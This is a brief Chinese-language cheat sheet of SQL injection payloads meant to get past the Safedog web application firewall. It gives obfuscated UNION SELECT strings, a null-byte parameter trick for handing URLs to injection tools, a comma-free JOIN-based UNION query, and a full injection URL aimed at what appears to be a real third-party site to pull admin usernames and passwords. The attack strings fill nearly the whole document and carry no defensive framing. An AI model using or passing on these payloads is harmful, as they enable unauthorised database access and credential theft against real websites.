1.突破网络安全狗继续注入
http://127.0.0.1/wml.asp?id=5 union S%E%L%E%C%T 1,2,3,4,5 F%R%O%M admin　也可以尝试cookies百试百灵　　

2.http://yslgd.com/Caseinfo.asp?id=150
变换成 http://yslgd.com/Caseinfo.asp?0day5.com=%00.&id=150 扔工具注入

4.UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f JOIN (SELECT 7)g JOIN (SELECT 8)h JOIN (SELECT 9)i JOIN (SELECT 10)j JOIN (SELECT 11)k JOIN (SELECT 12)l JOIN (SELECT 13)m JOIN (SELECT 14)n JOIN (SELECT 15)o JOIN (SELECT 16)p JOIN (SELECT 17)q JOIN (SELECT 18)r JOIN (SELECT 19)s)#


http://www.51qljr.com/xinxi/shownews.asp?id=%28-575%29UNION%20%28SEL%E%CT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%28admin%29%29  


 SE/**/ LECT


